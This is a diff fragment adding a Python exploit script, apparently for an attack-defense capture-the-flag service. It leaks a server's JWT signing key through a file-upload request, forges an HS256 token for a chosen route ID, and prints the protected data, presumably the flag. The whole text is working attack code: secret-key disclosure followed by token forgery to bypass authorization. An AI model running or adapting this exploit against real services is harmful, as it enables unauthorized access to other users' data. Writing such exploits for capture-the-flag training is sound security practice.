+ resp = sess.post(f'{host}/api/route/{route_id}/upload', files={
+ 'file': pld
+ })
+ key = re.findall(r"JWT_KEY=([A-Z\d]+)", resp.text)
+ assert len(key) == 1
+ return key[0]
+
+
+def pwn(ip: str, hint: str):
+ host = 'http://' + ip + ':8000'
+
+ s = checklib.get_initialized_session()
+ u, p = checklib.rnd_username(), checklib.rnd_password()
+ s.post(host + '/api/signup', json={'username': u, 'password': p})
+
+ jwt_key = leak_key(s, host)
+
+ token = jwt.encode({'route_id': hint}, jwt_key, algorithm='HS256')
+
+ resp = s.get(host + '/api/route/' + hint, params={'token': token})
+ print(resp.text, flush=True)
+
+
+if __name__ == '__main__':
+ pwn(sys.argv[1], sys.argv[2])